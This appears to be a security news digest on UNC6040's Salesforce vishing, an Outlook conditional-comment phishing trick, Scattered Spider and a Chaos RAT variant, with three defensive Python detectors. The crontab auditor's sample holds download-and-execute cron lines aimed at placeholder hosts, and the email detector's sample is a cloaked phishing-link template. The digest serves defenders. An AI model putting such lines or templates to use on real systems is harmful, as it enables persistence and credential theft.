Update: UNC6040 Vishing Campaign Exploits Salesforce for Data Theft and Extortion
UNC6040, a financially motivated threat group, has been running targeted voice phishing (vishing) campaigns against Salesforce environments since late 2024 and through 2025. Google's Threat Intelligence Group (GTIG) and Mandiant documented the campaign and showed how the group relies on social engineering, not on any flaw in the platform, to get into Salesforce tenants and exfiltrate data. Operators call employees while impersonating IT support and walk them through authorizing a connected app: a modified version of Salesforce's legitimate Data Loader tool. Once the app is authorized, the attackers query and export sensitive records, including personally identifiable information (PII), financial data, and business-process data, through what is, to Salesforce, an ordinary user-approved integration. Because the victim is already authenticated when they approve the app, MFA on the login does not by itself block this path; the OAuth grant is issued legitimately, and the controls that matter are which apps users are allowed to authorize and how much data any one user can pull.

In several reported cases UNC6040 used the stolen data for extortion, sometimes months after the initial exfiltration. The campaign has hit multinational organizations that use Salesforce as a system of record for customer data. Salesforce addressed the activity in March 2025, confirming that no vulnerability in its platform was exploited and that the breaches resulted from social engineering, and reiterated the importance of Multi-Factor Authentication (MFA) and user vigilance against phishing.

The group also uses Okta-themed phishing panels to collect credentials and routes its access through Mullvad VPN exit addresses, using the initial foothold to reach the victim's other cloud services. To reduce exposure, Salesforce recommends strict connected-app management (limiting which apps users may authorize and who may install them), least-privilege profiles and permission sets so that no single user can export whole objects, and Salesforce Shield event monitoring to alert on unusual query and download volumes. The campaign is a reminder that cloud tenants are breached through their users as often as through their software, and that defenses against social engineering need to be engineered as deliberately as patching.
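The two signals the campaign produces in sequence, an OAuth grant to a connected app that is not on the approved list followed by a burst of rows pulled through that app, can be correlated in a few lines. The Python below is an added example written for this digest; it is not code from GTIG, Mandiant or Salesforce, and its event layout is an invented generic shape rather than Salesforce's Event Monitoring objects. The app names, allowlist, VPN CIDR, thresholds and sample events are all constructed placeholders.

```python
"""Correlate connected-app authorisation with bulk row retrieval.

Added example. The event records below use an invented, generic layout,
not Salesforce's Event Monitoring schema; map real exports (user, app or
client name, source IP, row count, timestamp) onto it before use.
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta
import ipaddress

APPROVED_APPS = {"Corporate Data Loader", "Marketing Sync"}  # assumed allowlist
VPN_RANGES = [ipaddress.ip_network("198.51.100.0/24")]       # placeholder VPN egress
ROW_THRESHOLD = 50_000   # rows from one user+app inside WINDOW that warrants review
WINDOW = timedelta(hours=2)

# Constructed sample events (not real telemetry); ts is ISO-8601.
EVENTS = [
    {"ts": "2025-05-02T09:01:00", "user": "j.doe", "type": "OAUTH_GRANT",
     "app": "Data Loader", "ip": "198.51.100.17", "rows": 0},
    {"ts": "2025-05-02T09:04:00", "user": "j.doe", "type": "API_QUERY",
     "app": "Data Loader", "ip": "198.51.100.17", "rows": 20_000},
    {"ts": "2025-05-02T09:20:00", "user": "j.doe", "type": "API_QUERY",
     "app": "Data Loader", "ip": "198.51.100.17", "rows": 35_000},
    {"ts": "2025-05-02T10:00:00", "user": "a.lee", "type": "API_QUERY",
     "app": "Marketing Sync", "ip": "203.0.113.5", "rows": 40_000},
    {"ts": "2025-05-02T14:30:00", "user": "a.lee", "type": "API_QUERY",
     "app": "Marketing Sync", "ip": "203.0.113.5", "rows": 40_000},
]


def from_vpn(ip):
    """True when the source address falls in a known VPN egress range."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in VPN_RANGES)


def analyze(events):
    """Return review-worthy findings, in time order."""
    alerts = []
    recent = defaultdict(deque)   # (user, app) -> (ts, rows) seen within WINDOW
    granted_at = {}               # (user, app) -> when the app was authorised
    for ev in sorted(events, key=lambda e: e["ts"]):
        ts = datetime.fromisoformat(ev["ts"])
        key = (ev["user"], ev["app"])
        approved = ev["app"] in APPROVED_APPS
        base = {"ts": ev["ts"], "user": ev["user"], "app": ev["app"],
                "approved_app": approved, "vpn_source": from_vpn(ev["ip"])}

        if ev["type"] == "OAUTH_GRANT":
            granted_at[key] = ts
            if not approved:
                alerts.append({**base, "rows": 0,
                               "reason": "connected app authorised outside allowlist"})
            continue
        if ev["type"] != "API_QUERY":
            continue

        window = recent[key]
        window.append((ts, ev["rows"]))
        while window and ts - window[0][0] > WINDOW:   # drop events older than WINDOW
            window.popleft()
        total = sum(rows for _, rows in window)
        if total >= ROW_THRESHOLD:
            grant = granted_at.get(key)
            newly_granted = grant is not None and ts - grant <= WINDOW
            alerts.append({**base, "rows": total,
                           "reason": "bulk retrieval"
                           + (" shortly after app authorisation" if newly_granted else "")})
            window.clear()   # one finding per burst
    return alerts


if __name__ == "__main__":
    for finding in analyze(EVENTS):
        print(finding)
```

Run against the sample, `analyze` raises one finding for the unapproved grant and a second when the same user and app pass 50,000 rows nineteen minutes later, both tagged as coming from the VPN range; the approved app's two 40,000-row pulls fall in separate windows and stay quiet. The thresholds are where tuning belongs: set them from a baseline of legitimate Data Loader usage in your tenant.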
Sophisticated Phishing Attack Exploits Outlook’s HTML Rendering to Bypass Security
SANS researchers have documented a phishing campaign that abuses HTML conditional comments, a compatibility feature honoured by the classic Outlook desktop client on Windows because it renders HTML with the Word engine. Markup wrapped in <!--[if mso]> ... <![endif]--> is rendered only by that Outlook; to every other client it is an ordinary HTML comment. The complementary <!--[if !mso]><!-- --> ... <!--<![endif]--> form is the reverse: Outlook skips it, while Gmail, Apple Mail, Thunderbird and webmail render it. Legitimate newsletters use the pair to ship two layouts in one message. The attackers use it to ship two sets of links: the Outlook branch points at a benign destination, so a recipient or analyst viewing the message in Outlook, or a sandbox that renders like Outlook, sees nothing wrong, while everyone else is sent to a credential-harvesting page. First seen in 2019, the tactic resurfaced in 2025 in lures imitating bank account-verification notices aimed at staff at financial institutions and other organizations.

The impact is that of any credential phish, with the added problem that the message survives review: login credentials are stolen without the link ever tripping the URL checks of the client the security team happens to use. Microsoft has not issued a specific response, and there is nothing for it to patch; conditional comments are documented behaviour that email designers rely on. The fix belongs in the mail pipeline rather than the client: extract and reputation-check every URL in the raw HTML source, including those inside comment bodies, rather than only the links visible in one rendering; flag messages whose mso and !mso branches point at different hosts; and train staff to treat unsolicited verification requests with suspicion regardless of how they look. MFA, preferably phishing-resistant, limits what a harvested password is worth when a user does click.
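The branch comparison described above, as an added example in Python that is not part of the SANS report or any vendor's product: it splits the links in a message by which client will actually render them and flags the message when the two views disagree. The sample email is constructed and uses reserved documentation domains, not indicators from the campaign.

```python
"""Expose the links an Outlook conditional-comment phish shows to Outlook
versus to every other client.

Added example; the sample message is constructed and the domains are
reserved documentation names, not indicators from the SANS report.
"""
import re
from urllib.parse import urlparse

# Rendered only by the Word-engine Outlook (classic desktop client on
# Windows); a plain HTML comment everywhere else.
MSO_RE = re.compile(
    r"<!--\[if\s+(?:[a-z]+\s+)?mso[^\]]*\]>(.*?)<!\[endif\]-->", re.S | re.I)
# "Downlevel-revealed" form: Outlook skips it, every other client renders it.
NOT_MSO_RE = re.compile(
    r"<!--\[if\s+!mso[^\]]*\]>\s*<!-+\s*-*>(.*?)<!--\s*<!\[endif\]-->", re.S | re.I)
HREF_RE = re.compile(r"""href\s*=\s*["']([^"'>\s]+)""", re.I)

# Constructed lure: benign link for Outlook, harvesting link for everyone else.
SAMPLE_EMAIL = """<html><body>
<p>Your account requires verification within 24 hours.</p>
<!--[if mso]>
<a href="https://www.example.com/verify">Verify your account</a>
<![endif]-->
<!--[if !mso]><!-- -->
<a href="https://example.net/secure-login">Verify your account</a>
<!--<![endif]-->
<p>Questions? <a href="https://www.example.com/contact">Contact us</a></p>
</body></html>"""


def hosts(fragment):
    """Lower-cased hostnames of absolute http(s) links in an HTML fragment."""
    return {urlparse(u).netloc.lower() for u in HREF_RE.findall(fragment)
            if u.lower().startswith(("http://", "https://"))}


def analyze_email(html):
    """Split link hosts by the client that will render them and compare."""
    outlook_only = "".join(MSO_RE.findall(html))
    others_only = "".join(NOT_MSO_RE.findall(html))
    shared = NOT_MSO_RE.sub("", MSO_RE.sub("", html))   # markup outside any branch
    outlook = hosts(outlook_only) | hosts(shared)
    other = hosts(others_only) | hosts(shared)
    return {
        "outlook_hosts": outlook,
        "other_hosts": other,
        "hidden_from_outlook": other - outlook,
        "divergent": outlook != other,
    }


if __name__ == "__main__":
    print(analyze_email(SAMPLE_EMAIL))
```

On the sample, the Outlook view contains only www.example.com while every other client also gets example.net, so the message is marked divergent with example.net listed as hidden from Outlook. A gateway rule that scores on that divergence catches the technique without needing to know the phishing domain in advance; legitimate newsletters that use conditional comments normally point both branches at the same hosts.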
Update: Scattered Spider Targeting High-Value Sectors
Scattered Spider, a financially motivated and highly capable criminal group active since at least 2022, has become a serious threat to hospitality, telecommunications, finance, and retail. Its intrusions pair social engineering with solid technical tradecraft. The usual entry is vishing: operators call employees or the help desk while impersonating IT support and talk their way past multi-factor authentication (MFA), typically by getting MFA reset or a new factor enrolled on a target account. Targets are chosen after open-source intelligence (OSINT) reconnaissance on the organization and its staff, and the calls are timed to exploit busy, high-pressure environments where people make mistakes. The group's best-known intrusion was the 2023 breach of MGM Resorts, which caused major disruption to the company's IT systems.

Once inside, the group uses tools such as Mimikatz and Cobalt Strike to harvest credentials, escalate privileges, and exfiltrate sensitive data before ransomware is deployed. Encryption and ransom negotiation are outsourced to DragonForce, a Ransomware-as-a-Service (RaaS) operation, which leaves Scattered Spider free to concentrate on initial access and data theft. Its familiarity with corporate environments lets it move quickly through them, pivoting via Single Sign-On (SSO), VPN concentrators, and RDP gateways; the full chain is often complete in under 48 hours, which leaves little time to detect and contain it. Some of its tradecraft resembles that of nation-state advanced persistent threat (APT) groups, which has prompted speculation about state ties, but public attribution remains unclear.

The reliance on legitimate administrative tools, together with disabling security controls and deleting logs, makes incident response harder. The choice of high-value targets and the emphasis on stealing sensitive data point to deliberate, strategic campaigns, with extortion demands routinely backed by threats to leak. Defenders should enforce rigorous identity-verification procedures for help-desk password and MFA resets, deploy phishing-resistant MFA, and run capable endpoint detection and response (EDR/XDR); they should also train staff to recognize social-engineering calls and instrument the network so that lateral movement is detected early rather than after encryption starts.
Chaos RAT Variant Targets Windows and Linux Systems for Remote Access
A new variant of Chaos RAT, an open-source remote access trojan (RAT) written in Go, is being used against both Windows and Linux systems; the malware has appeared in attacks since late 2022, and the latest variant was analyzed by Acronis researchers. It is distributed through phishing: malicious links or attachments deliver it disguised as a legitimate tool, in one case a Linux network troubleshooting utility packaged as "NetworkAnalyzer[.]tar[.]gz" and served through phishing emails or counterfeit download sites. Once installed, the RAT connects to an external command-and-control server and waits for instructions, giving the operator a reverse shell, file manipulation, system reconnaissance, screenshots, and general remote control of the host. On Linux it persists by modifying system files, including the crontab, with an entry that periodically fetches and reinstalls the payload, so removing the binary without cleaning the scheduler leaves the host reinfected at the next run.

Chaos RAT has mostly been seen alongside cryptocurrency mining, in particular deployments of the XMRig miner, but its capabilities go well beyond that. Its administration panel lets operators build custom payloads and manage infected devices in the style of command-and-control frameworks such as Cobalt Strike and Sliver. The most recent release, 5.0.3, was published on May 31, 2024 and added features that improve its reach and stealth. The continued weaponization of open-source malware complicates attribution and lowers the bar for new operators. Security teams should watch for unexpected outbound connections and for crontab or scheduled-task changes on their hosts, and maintain strong phishing defenses to block the initial delivery.
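The crontab persistence described above leaves a recognisable shape behind: a job that downloads something and runs it, often from a world-writable directory. The Python auditor below is an added example, not code from Acronis or the Chaos RAT project; its heuristics are my own and the sample crontab is constructed (documentation IP and domain, no real indicators). Feed it the output of `crontab -l` for each user and the contents of /etc/cron.d to triage a host.

```python
"""Audit crontab text for download-and-execute persistence of the kind
described for Chaos RAT.

Added example with constructed input; the heuristics are illustrative
and are not indicators published by Acronis.
"""
import re

FETCH_RE = re.compile(r"\b(?:curl|wget)\b", re.I)
URL_RE = re.compile(r"https?://\S+|\b\d{1,3}(?:\.\d{1,3}){3}\b")
PIPE_SH_RE = re.compile(r"\|\s*(?:sudo\s+)?(?:ba|da|z)?sh\b", re.I)
# A path under a world-writable directory in command position
# (start of command, or right after ; & |), not merely as an argument.
TMP_EXEC_RE = re.compile(r"(?:^|[;&|])\s*/(?:tmp|dev/shm|var/tmp)/\S+")
ASSIGN_RE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*=")   # SHELL=, PATH=, ...

SAMPLE_CRONTAB = """# Constructed sample crontab (illustrative; not captured from a real host)
SHELL=/bin/sh
PATH=/usr/bin:/bin
0 2 * * * /usr/bin/find /var/log -name '*.gz' -mtime +30 -delete
*/10 * * * * curl -fsSL http://203.0.113.7/na.bin -o /tmp/.na && chmod +x /tmp/.na && /tmp/.na
@reboot /tmp/.na
30 1 * * 0 wget -q -O - https://updates.example.com/check.sh | sh"""


def parse_crontab(text):
    """Yield (line_no, schedule, command) for each job entry."""
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#") or ASSIGN_RE.match(line):
            continue
        if line.startswith("@"):               # @reboot, @daily, ...
            sched, _, cmd = line.partition(" ")
        else:
            parts = line.split(None, 5)        # five time fields, then the command
            if len(parts) < 6:
                continue
            sched, cmd = " ".join(parts[:5]), parts[5]
        yield n, sched, cmd.strip()


def audit_crontab(text):
    """Return findings for entries that match any persistence heuristic."""
    findings = []
    for n, sched, cmd in parse_crontab(text):
        reasons = []
        if FETCH_RE.search(cmd):
            reasons.append("fetches remote content")
        if PIPE_SH_RE.search(cmd):
            reasons.append("pipes output into a shell")
        if TMP_EXEC_RE.search(cmd):
            reasons.append("executes from a world-writable directory")
        if reasons:
            findings.append({"line": n, "schedule": sched, "command": cmd,
                             "remote": URL_RE.findall(cmd), "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in audit_crontab(SAMPLE_CRONTAB):
        print(f"line {f['line']} [{f['schedule']}]: {', '.join(f['reasons'])} -> {f['command']}")
```

On the sample, the log-rotation job passes while the three remaining entries are flagged: the ten-minute fetch-and-run loop (which also yields the remote address to block), the @reboot launcher from /tmp, and the weekly pipe into sh. When a hit like the first one turns up during response, remove the cron entry and the dropped binary together; clearing only the binary leaves the loop to pull it down again.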